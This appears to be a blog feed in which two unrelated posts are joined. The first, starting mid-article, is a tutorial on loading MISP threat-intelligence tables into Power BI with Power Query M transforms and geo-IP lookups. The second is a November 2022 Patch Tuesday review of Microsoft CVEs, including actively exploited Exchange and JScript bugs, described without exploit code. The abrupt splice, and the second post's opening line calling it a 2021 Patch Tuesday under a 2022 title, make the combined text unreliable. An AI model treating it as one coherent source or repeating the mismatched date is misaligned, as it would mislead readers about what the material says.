If you get an error such as “An error happened while reading data from the provider: ‘Character set ‘utf8mb3’ is not supported by .Net Framework.”, do not worry. Just install the latest version of the .NET Framework and the latest MySQL Connector for .NET. This should fix any issues you are having.

You can close the window; Power BI will remember and store the connection information for next time.

If you cannot authenticate or connect, recheck your username and password and confirm that you can reach the MISP server on port 3306 from the device that you are running Power BI Desktop on. Also, make sure you are using Database for the authentication type and not Windows Auth.

Create a save file so that we can start working on our data ingest transforms and manage the relationships between the various tables in the MISP schema.

  1. Select File
  2. Save As
  3. Select the location where you will save the local copy of your Power BI report.
  4. Click Save

Now, we have a blank report file and pre-configured data source. Awesomeness!

Power Query Transforms (ETL Process)

ETL: extract, transform, load. Look it up. Big money in the data analytics space by the way.

So, let’s get into looking at the data and making sure it is in the right format for our purposes. If you closed Power BI Desktop, open it back up. Once loaded, click on file and then Open report. Select the report you saved earlier. So, we have a nice and empty workspace. Let’s fix that!

In the Ribbon, click on Recent sources and select the source we created earlier. You should be presented with Navigator and a list of tables under the misp schema.

Selecting Tables in Power BI Desktop

Let all the tables we want to use load for visualizations later. In my experience, it helps to do this all at once instead of trying to add additional tables at a later date.

Select the tables in the next subsection, Recommended Tables, and click Load. This could take a while if your MISP instance has a lot of Events and Attributes in it. It will create a local copy of the database so that you can create your reports accurately. Then you can refresh this local copy when needed. We will talk about data refresh later as well.

Do not try to transform the data at this step, especially if you MISP instance has a lot of data in it. We will do the transforms in a later step.

Data Importing Into Power BI Desktop

Recommended Tables

  • misp.attribute_tags
  • misp.attributes
  • misp.event_blocklists
  • misp.event_tags
  • misp.events
  • misp.galaxies
  • misp.galaxy_clusters
  • misp.galaxy_elements
  • misp.object_references
  • misp.objects
  • misp.org_blocklists
  • misp.organisations
  • misp.over_correlating_values
  • misp.sightings
  • misp.tags
  • misp.warninglist_entries
  • misp.warninglists

As you will see in the table selection dialog box, there are a lot of tables to choose from and we need most of them so that we can do drill downs, filters, etc. Do be careful if you decide to pull in tables like misp.users, misp.auth_keys, or misp.rest_client_histories, etc. These tables can contain sensitive data such as API keys and hashed passwords.

Column Data Types and Transforming Timestamps

Now, let’s start cleaning the data up for our purposes.

We are going to use a Power Query for this. To open Power Query Editor, look in the Ribbon for the Transform data button in the Queries section.

Transform Data Button

Click this and it will open the Power Query Editor window.

We will start with the first table in Queries list on the left, misp attribute_tags. There are not many columns in this table but it will help us go over some terminology.

Power Query

As shown in the screenshot above, Power BI has done some classification of data types in the initial ingest. We have four numeric columns and one boolean column. All of this looks to be correct and usable in this state. Let’s move on to a table that needs some work.

The very next table, misp attributes, needs some work. There are a lot more rows and columns in this table. In fact, this is probably the biggest table in MISP bar the correlations table. One reason we did not import that one.

At first glance, nothing seems to be amiss; that is until we scroll to the right and see the timestamp column.

Power Query Epoch Timestamp

If you recognize this long number, tip of the hat to you. If not, this is a UNIX timestamp also known as an epoch timestamp. It is the duration of time since the UNIX epoch which is January 1st, 1970 at 00:00:00 UTC. While this works fine in programs such as PHP that powers MISP; projects such as Power BI need human-readable timestamp formats AND SO DO WE! So let’s make that happen.

What we are going to do is a one-step transform. This will remove the epoch timestamp column and replace it with a human-readable timestamp column that we can understand and so can the visualization filters of Power BI. This will give you the ability to filter by month, year, quarter, etc.

Power BI uses a languages called DAX and Power Query M. Will be mainly be using Power Query M for this transformation work. You use DAX for data analysis, calculations, etc.

https://docs.microsoft.com/en-us/dax/dax-overview
https://docs.microsoft.com/en-us/powerquery-m/m-spec-introduction

Using Power Query M we are going to transform the timestamp column by calculating the duration since the epoch. So let’s to this with the timestamp column of the misp attributes table.

To shortcut some of the code creation we are going to use a built in Transform called Extract Text After Delimiter. Select the Transform tab from the ribbon and then select Extract in the Text Column section of the ribbon. In the drop-down menu select Text After Delimiter. Enter any character in the Delimiter text field. I am going to use “1”. This will create the following code in the formula bar:

= Table.TransformColumns(#"Extract Text After Delimiter", {{"timestamp", each Text.AfterDelimiter(Text.From(_, "en-US"), "1"), type text}})
Formula Example

We are going to alter this command to get the result we want. Starting at the “(” sign, replace everything with:

misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Your formula bar should look like this:

= Table.TransformColumns(misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

And your column should have changed to a datetime type, little calendar/clock icon, and should be displaying a human readable values like in the screenshot below.

Timestamp Transformed

Do this with every epoch timestamp column you come across for all the tables. Make sure the epoch timestamp is already of type = numeric. If it is text you can use this code block to change it to numeric in the same step. Or add a type change step, then perform the transform as above.

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,Number.From(_)), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Using the last code block above that handles null and 0 values is probably the best bet overall so that you do not have errors when you encounter a cell that should have a timestamp but does not.

It is recommend to remove the first_seen and last_seen columns on the Attribute table as well. They are rarely used and cause more issues and errors than value. This is done in Power Query by right clicking on the column name and selecting “Remove”

Also remember to SAVE as you work. In the top left you will see the classic Save icon. This will trigger a pop-up saying that you have transforms that need to be applied. Approve this as you will have to before it saves. This will apply your new transforms to the dataset. With the attributes table, this may take a minute. Grab a coffee, we will wait…

Move on to the next table and so on. There is a lot of work up front with this ETL workflow. But the work is usually minimal to up keep after the initial cleanup. Only additional fields or changes to the source data would be a reason to go back to these steps after they are complete. Enter the whole change control discussion and proper release notes on products and ….. OKAY moving on.

There maybe an error in a field or two but usually it is okay. It will save any errors in a folder within Power Query Editor that you can review as needed.

Loading Tables With Transforms

Other Transforms

While you are doing the timestamp corrections on your tables, you may notice that there are other fields that could benefit from some alteration to make it easier to group, filter, etc. I will discuss some of them here but of course you may find others, this is not an exhaustive list by any means.

Splitting Tags

So now that we have gone through each table and fixed all the the timestamps, we can move on to other columns that might need adjustments. Our example will be the “misp tags” table. Navigate to the Power Query Editor again and select the this table.

MISP Tags ETL

Look at the name column in the misp.tags table. From personal experience, there may come a time when you only want to display or filter on just the value of the tag and not the full tag name. We will split this string into its parts and also keep the original. Then we can do what we want with it.

Select the “name” column then in the Ribbon click the Add Column tab. Then click Extract, Text Between Delimiters. For the delimiter use a colon “:”. This will create a new column on the far right. Here is the formula that was auto-generated and creates the new column:

= Table.AddColumn(misp_tags, "Text After Delimiter", each Text.AfterDelimiter([name], ":"), type text)

We will add an if statement to deal with tags that are just standalone words. But we do not want to break the TLP or PAP tags, so we add that as well. You will have to play with this as needed as tags can change and new ones are added all the time. You can just add more else if checks to the instruction below. Changing the name of the column is easy as replacing the string “Inserted Text After Delimiter” with whatever you want. I chose “Short_Tag_Name”. Comparer.OrdinalIgnoreCase tells Power Query M to use a case-insensitive comparer.

= Table.AddColumn(misp_tags, "Short_Tag_Name", each if Text.Contains([name], "tlp:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], "pap:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], ":") then Text.AfterDelimiter([name], ":") else [name])

Here is what you should have now. Yay!

MISP Tags Split ETL Results

Relationship Mapping

Why Auto Mapping in Power BI Doesn’t Work

Power BI tries to help you by finding commonalities in the tables you load and automatically building relationships between them. Then is usually not correct, especially when the data is from an application and not purpose built for reporting. We can tell Power BI to stop helping.

Let’s stop the madness.
Go to File, Options and settings, Options
Uncheck all the boxes in the “Relationships” section

Disable Auto Mapping

Once this is complete, click on the Manage relationships button under the Modeling tab of the Ribbon. Delete any relationships you see there.

Managing Relationships

Once your panel looks like the one above, click New…
We can create the relationship using this selection panel…

Create a Relationship

We can also use the graphical method. You can get to the graph by closing the Create and Manage relationship windows and clicking on the Model icon on the left of the Power BI workspace.

Managing Relationships Graphically
Relationship Map

Here we can drag and drop connectors between tables. Depending on your style, you may like one method over the other. I prefer the drag and drop method. To each their own.

Process to Map Tables

To map the relationships of these tables, you need to know a little about MISP and how it works.

  • Events in MISP can have tags, objects, attributes, galaxies (basically groups of tags), and must be created by an organization.
  • Attributes can have tags and sightings.
  • Objects are made up of Attributes
  • Warninglists are not directly related but can match against Attributes
  • Events and Organizations can be blocked by being placed on a corresponding blocklist
  • There is a table called over_correlating_values that tracks attributes that are very common between many events.

Using this information and user knowledge of MISP, you can map what relates to the other. Mainly, mostly tables have an “id” column that is the key of that table. For instance the tags table column “id” is related to the “tag_id” of the event_tags table. To make this easier you can rename the “id” column of the tags table to “tag_id” so that it matches. You will have to go through this process with all the tables. There will be relationships that are not “active”. This is due to multiple relationship per table were create ambiguity in the model. Ambiguity meaning uncertainty. Which relationship would the software choose. It does not like this. So for the models sake you have to pick which one is active by default if there is a conflict. You can use DAX when making visualizations to temporally activate an inactive relationship if you need to. Great post on this here: https://www.vivran.in/post/understanding-ambiguity-in-power-bi-data-model

Personally, relationship mapping was the most tedious part for me. But once it is done you should not have to change it again.

Examples of a Relationship Map

Here is what the relationship model should look like when you are done. Now we can start building visualizations!

Example of a Complete Relationship Map

I will leave the rest of the relationship mapping as a exercise for you. It will help you better understand how MISP uses all this data as well.

Later we will talk about Power BI templates and the one we are providing to the community.

Making your first visualization

What do you want to visualize

At this stage you have to start looking at your Primary Intelligence Requirements (PIR). Why are you doing this work? What is the question you are answering and who is asking the question?

For example, if your CISO is asking for a constantly updating dashboard of key metrics around the CTI Program then your requirement is just that. You can fulfill this requirement with Power BI Desktop and Power BI Service. So as a first step we need to create some visualizations that will provide insights into the operational status of the CTI program.

Count all the things

To start off easy, we will just make some charts that count the number of Events and Attributes that are currently in our MISP instance during a certain time window.
To do this we will go back to Power BI Desktop and the Report workspace.

Starting to Create a Visualization

So let’s start with Events and display them in a bar chart over time. Expand the misp events table in the Fields panel on the left. Select the event_id and check the box. This will place that field in the X-axis, drag it down to the Y-axis. This will change it to a count. Then select the Date field in the Events table. This will create the bar chart in the screenshot below. You will have to resize it by dragging the corner of the chart as you would with any other window.

Histogram Example

We need to filter down on the year the Event was created. Drag Year in the Date field hierarchy over to the Filter on all pages panel. Then change the filter type to basic. Then select the last 5 years to get a small dataset. This will be different depending on the amount and age of your MISP dataset.

Filtering Visuals

Nice. Now there is a thing that Power BI does that will be annoying. If you want to look at data over a long period of time it will, by default, group all of the data by that views bucket no matter if it has another higher order bucket. That probably makes no sense. But for example, if you are looking at data over two years and then want to see how many events per month, it will combine the data for the two years and then show you that total for the months Jan-Dec. It also concatenates the labels by default. See below, this is five years of data but it is only show the sum of all events that happened in each month over those five years.

Time Buckets Not Correct

To change this you can click on the forked arrow to the left of the double arrow highlighted in the screenshot above. This will split the hierarchy. You will have to drill up to the highest level of the hierarchy first using the single up arrow. Click this until you are at years only. We can also turn off label concatenation. See the highlighted areas in the screenshot below. Now this is more like it!

Time Buckets Correctly Configured

Using a Slicer as a time filter

Now we need to be able to change the date range that we are viewing easier to change. Let’s add a Slicer for that! Drag the Slicer visualization to the canvas. You can let it live on top of the visualization or reorganize. Not drag the Date field of the event table into the new visualization. You should be left with a slider that can now filter the main visualization. Awesome. See the example below.

Slicer Example

You can also change the way the Slicer looks or operates with the options menu in the top right. See below.

Different Types of Slicers

Ask questions about your data

Let’s add some additional functionality to our report. Click on the three dots, … , in the visualization selection panel. Then click Get More Visuals, then select or search for and select Text Filter by Microsoft. Add it to your environment. Then add it and the Q&A visualizations to your canvas. To use the Text Filter you need to give it fields to search in. Add the value1 field from the attributes table. This is the main field in the attributes table that stores your indicator of compromise or IoC for short.

Text Filter

After you rearrange some stuff to make everything fit, ask the following question in your Q&A visual, “How many attribute_id are there?”. Give it a minute and you should get back a count of the number of attributes in the dataset. Nice!

Now do a Text Search in that visual for an IP you know is in your MISP instance. I know we have the infamous 8.8.8.8 in ours, IDS flag set to false of course :). Now the text search will filter the Q&A answer and it should show you how many times that value is seen in your dataset. It also filters your bar chart to show you when the events were created that contain that data! If your bar chart doesn’t change, check you relationship maps. It might be the filtering direction. Play with this until your data behaves the way you need it to. Imagine the capabilities of this if you get creative! You can also mess with the built in design templates to make this sexier or you can manually change backgrounds, borders, etc

Example Visuals

Add in Geo-location data

Before we start: Sign up for a free account here: https://www.ip2location.io/

Record your API address, we will use this soon.

Lets also create a new transform that will add geoip data to the IP addresses in our attributes table.

We are going to start by creating a new table with just IP attributes.

Click on Transform data in the Ribbon. Then right click on the misp attributes table.

Duplicate the table and then right click on the new table and select rename. I renamed mine “misp ip_addresses_last_30_days_geo”.

Now we are going to do some filtering to shrink this table to the last 30 days worth of IP attributes. If we did not do this we my burn through our API credits due to the amount of IPs in our MISP instance. Of course you can change the date range as needed for your use case.

Right click the column type and filter to just ip-src and ip-dst.

Selecting Attribute Types to Filter Column

Then filter to the last 30 days. Right click the timestamp column and open Date/Time Filters > In the Previous…

Filter Tables by Time

In the dialog box, enter you time frame. I entered last 30 days as below.

Filtering to the Last 30 Days

Then we are going to follow the instructions that can be found at the following blog: https://www.fourmoo.com/2017/03/14/power-bi-query-editor-getting-ip-address-details-from-ip-address/

In that blog you create a custom function like the one below. Follow the instructions in that blog, it is a great read.

fn_GetIPAddressDetails

let
Source = (#"IP Address" as text) => let
Source = Json.Document(Web.Contents("https://api.ip2location.io/?ip=" & #"IP Address" & "&key=<ip2location_api_key>")),
#"Converted to Table" = Record.ToTable(Source),
#"Transposed Table" = Table.Transpose(#"Converted to Table"),
#"Promoted Headers" = Table.PromoteHeaders(#"Transposed Table")
in
#"Promoted Headers"
in
Source

Once you have this function saved you can use it to create a new set up columns in your new IP Address table, the one a name “misp ip_addresses_last_30_days_geo” earlier. Use the column value1 for the argument of the function.

Example of GeoIP locations and Text Filter on Tag Name

Sharing with the community

On the NIVSO CTI Github page, you will find a Power BI template file that has all the Power BI related steps above for you. All you have to do is change the data source to your MISP and get an API key for https://www.ip2location.io/.

Download the template file located here: https://github.com/NVISOsecurity/nviso-cti/tree/master/Power_BI

Use the import function under the File menu in the Power BI Desktop ribbon.

Import Function

Import the template. There will be errors as you have not specified your data source. Cancel the login dialog box and close the Refresh dialog box. It will show the IP of my dev MISP, you will need to specify your data source. Select Transform Data in the ribbon and then Data source settings. Here you can edit the source information and add your credentials. (Make sure you have configured your MISP instance for remote MySQL access and installed the MySQL .NET connector)

Close Prompt to Update Creds
Change Data Source
Accessing Source Settings
Change MySQL Source
Adding Your Creds 1

Make sure you set the encryption checkbox as needed.

Adding Your Creds 2

Select Transform Data in the ribbon again and then Transform data to open the Power Query editor.

Accessing Power Query to Edit Custom Function

Then select the custom function for geoip and use the Advanced Editor to add your API key.

Add Your API Key

Now, if you data source settings/credentials are correct you can Close and Apply and it should start pulling in the data from your configured MISP instance.

Conclusion

Note of caution with all this, check your source data to make sure what your seeing in Power BI matches what you see in MISP. As my brother-in-law and data analytics expert, Joshua Henderson, says: “Always validate that what your outcome in Power BI/Tableau is correct for what you have in the DB. I will either already know what the outcome should be in my viz tool, or I will do it after I create my viz. Far too often I see data counts off and it can be as small as a mis-click on a filter, or as bad as your mapping being off and you are dropping a large percentage of say attribute_ids. It also can help you with identifying issues; either with your database not updating correctly, or an issue with your data refresh settings.”

Now that you have built you first visualization, I will leave it to you to build more and would love to see what you come up with. In the next blog I will demonstrate how to publish this data to the Power BI Service and use the Data Gateway to automate dataset refresh jobs! Once published to the Power BI Service you will be able to share your reports and create and share dashboard built from individual visual in your reports. Even view all this on your phone!!

I also leave you with this idea. Now that your MISP data is in Power BI, what other data can you pull into Power BI to pair with this data? SIEM data? Data from your XDR/EDR? Data from your SOC’s case management solution? Data from your vulnerability management platform? You get the idea!

Until next time!

Thanks for reading!!!
Robert Nixon
@syloktools

Rock On!

The November 2022 Security Update Review

8 November 2022 at 18:28

Welcome to the penultimate Patch Tuesday of 2021. As expected, Adobe and Microsoft have released their latest security updates and fixes to the world. Take a break from your regularly scheduled activities and join us as we review the details of their latest security offerings.

Adobe Patches for November 2022

For November, Adobe released no patches at all. They’ve released as few as one in the past, but this is the first month in the last six years where they had no fixes at all. Perhaps the U.S. elections play a factor, as Patch Tuesday hasn’t fallen on Election Day since 2016. Whatever the cause, enjoy a month of no Adobe updates.

Microsoft Patches for November 2022

This month, Microsoft released 64 new patches addressing CVEs in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server (NPS); Windows BitLocker; and Linux Kernel and Open Source Software. This is in addition to five other CVEs from third parties being integrated into Microsoft products bringing the total number of fixes to 69. Eight of these CVEs were submitted through the ZDI program.

Of the 64 new patches released today, 11 are rated Critical and 53 are rated Important in severity. This volume is similar to previous November releases. It also pushes Microsoft over the number of fixes they released in 2021 and makes this year their second busiest ever for patches.

One of the new CVEs released this month is listed as publicly known and six others are listed as being in the wild at the time of release, which includes the two Exchange bugs listed as under active attack since September. Let’s take a closer look at some of the more interesting updates for this month, starting with those Exchange fixes we’ve been waiting for:

-       CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution Vulnerability
-       CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability
These patches address the recent Exchange bugs that are currently being used in active attacks. They were expected last month, but they are finally here (along with several other Exchange fixes). These bugs were purchased by the ZDI at the beginning of September and reported to Microsoft at the time. At some point later, they were detected in the wild. Microsoft has released several different mitigation recommendations, but the best advice is to test and deploy these fixes. There were some who doubted these patches would release this month, so it’s good to see them here.

-       CVE-2022-41128 – Windows Scripting Languages Remote Code Execution Vulnerability
This bug in JScript is also listed as being exploited in the wild. An attack would need to lure a user to either a specially crafted website or server share. In doing so, they would get their code to execute on an affected system at the level of the logged-on user. Microsoft provides no insight into how widespread this may be but considering it’s a browse-and-own type of scenario, I expect this will be a popular bug to include in exploit kits.

-       CVE-2022-41091 – Windows Mark of the Web Security Feature Bypass Vulnerability
If you follow Will Dormann on Twitter, you probably have already read quite a bit about these types of bugs. Mark of the Web (MoW) is meant to be applied to files downloaded from the Internet. These files should be treated differently and receive security warning dialogs when accessing them. This vulnerability is also listed as being under active attack, but again, Microsoft provides no information on how widespread these attacks may be.

-       CVE-2022-41073 – Windows Print Spooler Elevation of Privilege Vulnerability
The legacy of PrintNightmare continues as threat actors continue to mine the vast attack surface that is the Windows Print Spooler. While we’ve seen plenty of other patches since PrintNightmare, this one is listed as being in the wild. While not specifically called out, disabling the print spooler should be an effective workaround. Of course, that breaks printing, but if you’re in a situation where patching isn’t feasible, it is an option.

-       CVE-2022-41125 – Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
The final bug listed under active attack for November is this privilege escalation in the “Cryptography Application Programming Interface - Next Generation” (CNG) Key Isolation Service. An attacker can abuse this bug to run their code at SYSTEM. They would need to be authenticated, which is why bugs like these are often paired with some form of remote code execution exploit. As with all the other in-the-wild exploits, there’s no indication of how widely this is being used, but it’s likely somewhat targeted at this point. Still, test and deploy the updates quickly.

Here’s the full list of CVEs released by Microsoft for November 2022:

CVE Title Severity CVSS Public Exploited Type
CVE-2022-41091 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 Yes Yes SFB
CVE-2022-41040 Microsoft Exchange Server Elevation of Privilege Vulnerability Critical 8.8 No Yes EoP
CVE-2022-41082 Microsoft Exchange Server Remote Code Execution Vulnerability Critical 8.8 No Yes RCE
CVE-2022-41128 Windows Scripting Languages Remote Code Execution Vulnerability Critical 8.8 No Yes RCE
CVE-2022-41125 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2022-41073 Windows Print Spooler Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2022-39327 * GitHub: CVE-2022-39327 Improper Control of Generation of Code ('Code Injection') in Azure CLI Critical N/A No No RCE
CVE-2022-41080 Microsoft Exchange Server Elevation of Privilege Vulnerability Critical 8.8 No No EoP
CVE-2022-38015 Windows Hyper-V Denial of Service Vulnerability Critical 6.5 No No DoS
CVE-2022-37967 Windows Kerberos Elevation of Privilege Vulnerability Critical 7.2 No No EoP
CVE-2022-37966 Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability Critical 8.1 No No EoP
CVE-2022-41039 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41088 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41044 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41118 Windows Scripting Languages Remote Code Execution Vulnerability Critical 7.5 No No RCE
CVE-2022-3602 * OpenSSL: CVE-2022-3602 X.509 certificate verification buffer overrun High 7.5 No No RCE
CVE-2022-3786 * OpenSSL: CVE-2022-3786 X.509 certificate verification buffer overrun High 7.5 No No DoS
CVE-2022-41064 .NET Framework Information Disclosure Vulnerability Important 5.8 No No Info
CVE-2022-23824 * AMD: CVE-2022-23824 IBPB and Return Address Predictor Interactions Important Unknown No No Info
CVE-2022-41085 Azure CycleCloud Elevation of Privilege Vulnerability Important 7.4 No No EoP
CVE-2022-41051 Azure RTOS GUIX Studio Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41099 BitLocker Security Feature Bypass Vulnerability Important 4.6 No No SFB
CVE-2022-39253 * GitHub: CVE-2022-39253 Local clone optimization dereferences symbolic links by default Important 5.5 No No Info
CVE-2022-41066 Microsoft Business Central Information Disclosure Vulnerability Important 4.4 No No Info
CVE-2022-41096 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41105 Microsoft Excel Information Disclosure Vulnerability Important 7.8 No No Info
CVE-2022-41106 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41063 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41104 Microsoft Excel Security Feature Bypass Vulnerability Important 5.5 No No SFB
CVE-2022-41123 Microsoft Exchange Server Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41078 Microsoft Exchange Server Spoofing Vulnerability Important 8 No No Spoofing
CVE-2022-41079 Microsoft Exchange Server Spoofing Vulnerability Important 8 No No Spoofing
CVE-2022-41047 Microsoft ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41048 Microsoft ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41107 Microsoft Office Graphics Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41062 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41122 Microsoft SharePoint Server Spoofing Vulnerability Important 6.5 No No Spoofing
CVE-2022-41120 Microsoft Windows Sysmon Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41060 Microsoft Word Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41103 Microsoft Word Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41061 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-38023 Netlogon RPC Elevation of Privilege Vulnerability Important 8.1 No No EoP
CVE-2022-41056 Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41097 Network Policy Server (NPS) RADIUS Protocol Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2022-41119 Visual Studio Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41100 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41045 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41093 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41114 Windows Bind Filter Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2022-41095 Windows Digital Media Receiver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41050 Windows Extensible File Allocation Table Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41098 Windows GDI+ Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41052 Windows Graphics Component Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41086 Windows Group Policy Elevation of Privilege Vulnerability Important 6.4 No No EoP
CVE-2022-37992 Windows Group Policy Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41057 Windows HTTP.sys Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41055 Windows Human Interface Device Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41053 Windows Kerberos Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41049 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 No No SFB
CVE-2022-41058 Windows Network Address Translation (NAT) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41101 Windows Overlay Filter Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41102 Windows Overlay Filter Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41090 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2022-41116 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2022-41054 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-38014 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2022-41113 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41109 Windows Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41092 Windows Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP

* Indicates this CVE had previously been assigned by a 3rd-party and is now being incorporated into Microsoft products.

There are four additional bugs in Exchange Server receiving fixes this month, and three of those were reported by ZDI Vulnerability Researcher Piotr Bazydło. Most notably, the privilege escalation bug is due to Exchange having a hardcoded path to a file on the “D:” drive. If a “D:” exists and an attacker puts a DLL in the specified folder, Exchange will load the DLL. By default, low-privileged users have write access to the “D:” drive (assuming it exists). Another vector would be if the low-privileged attacker can insert an optical disk or attach an external drive that will be assigned the letter “D:”. Hard to believe a hard-coded path still exists within Exchange, but here we are. The two spoofing bugs would allow an authenticated attacker to obtain the NTLMv2 challenge and eventually perform further NTLM Relaying attacks. I have a strong premonition many Exchange administrators have a long weekend in front of them.

Looking at the remaining Critical-rated fixes, the two privilege escalation bugs in Kerberos stand out. You’ll need to take additional actions beyond just applying the patch. Specifically, you’ll need to review KB5020805 and KB5021131 to see the changes made and next steps. Microsoft notes this is a phased rollout of fixes, so look for additional updates to further impact the Kerberos functionality. There’s another patch for Scripting Languages. In this case, it’s JScript and Chakra, and this one is not listed as under active attack. There are three Critical-rated fixes for Point-to-Point Tunneling Protocol (PPTP). This seems to be a continuing trend of researchers looking for (and finding) bugs in older protocols. If you rely on PPTP, you should really consider upgrading to something more modern. There’s a Critical-rated denial-of-service (DoS) bug in Hyper-V, which is pretty unusual to see. DoS bugs rarely get the Critical tag, but Microsoft states, “Successful exploitation of this vulnerability could allow a Hyper-V guest to affect the functionality of the Hyper-V host.” I guess that’s severe enough to earn a Critical rating despite the 6.5 CVSS score. The fix for the Azure CLI was actually released a couple of weeks ago, and it’s getting documented now.

In addition to the fixes we’ve already discussed, there are 11 other patches for remote code execution vulnerabilities, including a memory corruption bug in the Windows Graphics Component reported by ZDI Vulnerability Researcher Hossein Lotfi. There are also multiple RCE bugs in various Office components, including one from ZDI Vulnerability Researchers Mat Powell and Michael DePlante. For these cases, user interaction would be required – the Preview Pane isn’t an exploit vector. There’s an authenticated SharePoint RCE, but a default user has the needed permissions to take over a SharePoint server. The vulnerability in Azure RTOS would require a user to run specially crafted code, so a level of social engineering would likely be needed to exploit this bug. The final two RCE bugs are in the ODBC driver, and these would require some social engineering to exploit as well. An attacker would need to convince someone to connect to their SQL server via ODBC. If they can do that to an affected system, they could execute code remotely on the client.

A total of 26 bugs in this release are Elevation of Privilege (EoP) bugs, including those already mentioned. The majority of these require an authenticated user to run specially crafted code on an affected system, but there are a few that stand out. The first is the fix for Netlogon that reads similar to the aforementioned Kerberos fixes. Microsoft is rolling out updates in phases and admins should review KB5021130 for additional steps. The bug in Azure CloudCycle has a brute force component, which definitely makes exploitation more difficult. Still. If you are using CloudCycle to manage your HPC environments on Azure, ensure you get it updated. The fixes for ALPC note the bugs could be used to escape a contained execution environment. While certainly not the first bugs to do so, I don’t recall Microsoft documenting this before now. Finally, there’s an EoP in SysInternals services. These tools are often used by incident responders, so definitely make sure you have an updated version before heading out to recover a compromised system. 

The November release includes eight new fixes for information disclosure bugs. Most of the info disclosure vulnerabilities only result in leaks consisting of unspecified memory contents. There is one notable exception. The vulnerability in Business Central requires admin credentials but could lead to the disclosure of integration secrets that are owned by a different partner. Presumably, you would be able to impersonate the other client with this info.

